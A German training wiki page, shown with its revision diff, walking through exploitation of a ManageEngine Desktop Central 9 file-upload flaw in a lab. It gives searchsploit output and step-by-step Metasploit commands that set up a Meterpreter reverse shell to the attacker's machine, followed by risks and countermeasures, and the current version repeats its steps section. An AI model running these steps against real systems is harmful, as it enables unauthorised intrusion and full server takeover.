Manager Central Schwachstelle: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) == '''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. C…“)
 
 
(12 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
== Details zur Schwachstelle: ManageEngine Desktop Central (CVE-2020-10189) ==
+
== Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit ==
 +
:Schwachstelle:
 +
*Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE).
 +
*Diese Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt.
 +
;Angriffspunkt:
 +
*Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft.
 +
*Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen.
 +
;Ausnutzung:
 +
*Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.
  
'''Schwachstelle''': Die Schwachstelle in ManageEngine Desktop Central (z. B. CVE-2020-10189) ermöglicht eine Remote Code Execution (RCE) durch unsichere Deserialisierung von Daten in ungepatchten Versionen. Dies ermöglicht es einem Angreifer, beliebigen Code auf dem Server auszuführen.
+
=== Warum dieser Exploit? ===
 +
*Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird.
  
'''Angriffspunkt''': Die Schwachstelle befindet sich in der Verwaltungsschnittstelle von Desktop Central, die standardmäßig auf einem Webserver läuft. Angreifer können speziell gestaltete HTTP-Anfragen an den Server senden, um unsichere Deserialisierung auszulösen und bösartigen Code auszuführen.
+
==Exploit suchen==
 +
*searchsploit "ManageEngine Desktop Central 9"
 +
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 +
  Exploit Title                                                                                                          |  Path
 +
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 +
ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution      | multiple/webapps/48176.py
 +
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution                                            | jsp/webapps/34518.txt
 +
ManageEngine Desktop Central - Create Administrator                                                                      | multiple/webapps/43892.txt
 +
ManageEngine Desktop Central - Java Deserialization (Metasploit)                                                        | multiple/remote/48224.rb
 +
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting                                                            | java/webapps/45499.txt
 +
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload                                                | jsp/webapps/29674.txt
 +
<span style="color: red;">ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)                                            | jsp/remote/38982.rb</span>
 +
ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery                                                  | multiple/webapps/35980.html
 +
ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)                                          | windows/remote/34594.rb
 +
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 +
Shellcodes: No Results
 +
==Exploit Metasploit zur Verfügung stellen==
 +
*sudo cp /usr/share/exploitdb/exploits/jsp/remote/38982.rb /usr/share/metasploit-framework/modules/exploits/windows/http/
 +
'''Wir müssen später in Metasploit reload_all ausführen, um das Modul verfügbar zu machen.'''
  
'''Ausnutzung''': Ein Angreifer kann ein speziell entwickeltes Exploit-Tool (z. B. Metasploit-Modul) verwenden, um die Schwachstelle auszunutzen und eine Remoteshell zu erhalten. Der Exploit nutzt unsichere Deserialisierungspraktiken im Servercode aus, um die Kontrolle zu erlangen.
 
  
 
=== Schritte zur Ausnutzung ===
 
=== Schritte zur Ausnutzung ===
  
# Überprüfe die Version von ManageEngine Desktop Central, um festzustellen, ob sie anfällig ist.
+
====Starte die Metasploit-Konsole====
# Verwende Metasploit, um den passenden Exploit zu finden, der die Schwachstelle ausnutzt.
+
*msfconsole
# Konfiguriere den Exploit mit der Ziel-IP-Adresse (RHOSTS), deiner IP-Adresse (LHOST), und setze den Payload (z. B. `java/meterpreter/reverse_tcp`).
+
 
# Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.
+
====Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit====
 +
  use exploit/windows/http/38982
 +
 
 +
====Setze die Optionen für das Zielsystem und die Payload====
 +
  set RHOST 10.0.10.107 
 +
  set RPORT 8383       
 +
  set LHOST 10.0.10.101 
 +
  set LPORT 4444         
 +
  set PAYLOAD windows/meterpreter/reverse_tcp
 +
 
 +
====Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind====
 +
  show options
 +
 
 +
====Führe den Exploit aus====
 +
  exploit
 +
 
 +
====Überprüfe die Verbindung==== 
 +
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
  
 
=== Warum ist diese Schwachstelle gefährlich? ===
 
=== Warum ist diese Schwachstelle gefährlich? ===
  
* '''Remote Code Execution (RCE)''': Ermöglicht es einem Angreifer, beliebige Befehle auf dem Server auszuführen, was zur vollständigen Kompromittierung des Systems führen kann.
+
* Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
* '''Ungepatchte Systeme''': Viele Organisationen haben es möglicherweise versäumt, ihre Systeme zu aktualisieren, was sie anfällig macht.
+
* Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
* '''Weitreichende Auswirkungen''': Ein erfolgreicher Angriff kann nicht nur das kompromittierte System gefährden, sondern auch dazu verwendet werden, sich lateral im Netzwerk zu bewegen und andere Systeme zu infizieren.
+
* Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.
* '''Einfacher Zugang''': Wenn der Webserver öffentlich zugänglich ist und keine Sicherheitsmaßnahmen wie Firewalls oder zusätzliche Authentifizierungen vorhanden sind, kann der Angriff sehr einfach durchgeführt werden.
+
 
 +
=== Gegenmaßnahmen ===
 +
 
 +
* Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
 +
* Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
 +
* Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.
 +
 
 +
==Exploit Metasploit zur Verfügung stellen==
 +
*sudo cp /usr/share/exploitdb/exploits/jsp/remote/38982.rb /usr/share/metasploit-framework/modules/exploits/windows/http/
 +
'''Wir müssen später in Metasploit reload_all ausführen, um das Modul verfügbar zu machen.'''
 +
 
 +
 
 +
=== Schritte zur Ausnutzung ===
  
=== Beispiel für Metasploit-Konfiguration ===
+
====Starte die Metasploit-Konsole====
 +
*msfconsole
 +
 
 +
====Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit====
 +
  use exploit/windows/http/38982
 +
 
 +
====Setze die Optionen für das Zielsystem und die Payload====
 +
  set RHOST 10.0.10.107 
 +
  set RPORT 8383       
 +
  set LHOST 10.0.10.101 
 +
  set LPORT 4444
 +
  set SSL true       
 +
  set PAYLOAD windows/meterpreter/reverse_tcp
 +
 
 +
====Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind====
 +
  show options
 +
 
 +
====Führe den Exploit aus====
 +
  exploit
 +
 
 +
====Überprüfe die Verbindung==== 
 +
Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.
 +
 
 +
=== Warum ist diese Schwachstelle gefährlich? ===
  
Um die Schwachstelle auszunutzen, kann folgendes Metasploit-Modul verwendet werden:
+
* Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
 +
* Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
 +
* Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.
  
<code>
+
=== Gegenmaßnahmen ===
msf6 > use exploit/windows/http/manageengine_dc_pmp_sqli_rce
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RHOSTS 10.0.10.107
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set RPORT 8022
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LHOST <deine_IP>
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > set LPORT 4444
 
msf6 exploit(windows/http/manageengine_dc_pmp_sqli_rce) > run
 
</code>
 
  
Nach erfolgreichem Exploit erhält der Angreifer eine Meterpreter-Sitzung und kann weitergehende Post-Exploitation-Schritte durchführen, wie das Sammeln von Anmeldeinformationen, Dateisystemmanipulationen und das Einrichten von Persistenz.
+
* Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
 +
* Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
 +
* Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.

Aktuelle Version vom 29. August 2024, 14:49 Uhr

Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit

Schwachstelle:
  • Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE).
  • Diese Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt.
Angriffspunkt
  • Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft.
  • Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen.
Ausnutzung
  • Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.

Warum dieser Exploit?

  • Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird.

Exploit suchen

  • searchsploit "ManageEngine Desktop Central 9"
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ManageEngine Desktop Central - 'FileStorage getChartImage' Deserialization / Unauthenticated Remote Code Execution       | multiple/webapps/48176.py
ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution                                             | jsp/webapps/34518.txt
ManageEngine Desktop Central - Create Administrator                                                                      | multiple/webapps/43892.txt
ManageEngine Desktop Central - Java Deserialization (Metasploit)                                                         | multiple/remote/48224.rb
ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting                                                             | java/webapps/45499.txt
ManageEngine Desktop Central 8.0.0 build < 80293 - Arbitrary File Upload                                                 | jsp/webapps/29674.txt
ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)                                             | jsp/remote/38982.rb
ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery                                                  | multiple/webapps/35980.html
ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload (Metasploit)                                           | windows/remote/34594.rb
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploit Metasploit zur Verfügung stellen

  • sudo cp /usr/share/exploitdb/exploits/jsp/remote/38982.rb /usr/share/metasploit-framework/modules/exploits/windows/http/

Wir müssen später in Metasploit reload_all ausführen, um das Modul verfügbar zu machen.


Schritte zur Ausnutzung

Starte die Metasploit-Konsole

  • msfconsole

Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit

 use exploit/windows/http/38982

Setze die Optionen für das Zielsystem und die Payload

 set RHOST 10.0.10.107  
 set RPORT 8383         
 set LHOST 10.0.10.101   
 set LPORT 4444          
 set PAYLOAD windows/meterpreter/reverse_tcp

Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind

 show options

Führe den Exploit aus

 exploit

Überprüfe die Verbindung

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
  • Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.

Exploit Metasploit zur Verfügung stellen

  • sudo cp /usr/share/exploitdb/exploits/jsp/remote/38982.rb /usr/share/metasploit-framework/modules/exploits/windows/http/

Wir müssen später in Metasploit reload_all ausführen, um das Modul verfügbar zu machen.


Schritte zur Ausnutzung

Starte die Metasploit-Konsole

  • msfconsole

Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit

 use exploit/windows/http/38982

Setze die Optionen für das Zielsystem und die Payload

 set RHOST 10.0.10.107  
 set RPORT 8383         
 set LHOST 10.0.10.101  
 set LPORT 4444
 set SSL true         
 set PAYLOAD windows/meterpreter/reverse_tcp

Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind

 show options

Führe den Exploit aus

 exploit

Überprüfe die Verbindung

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
  • Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.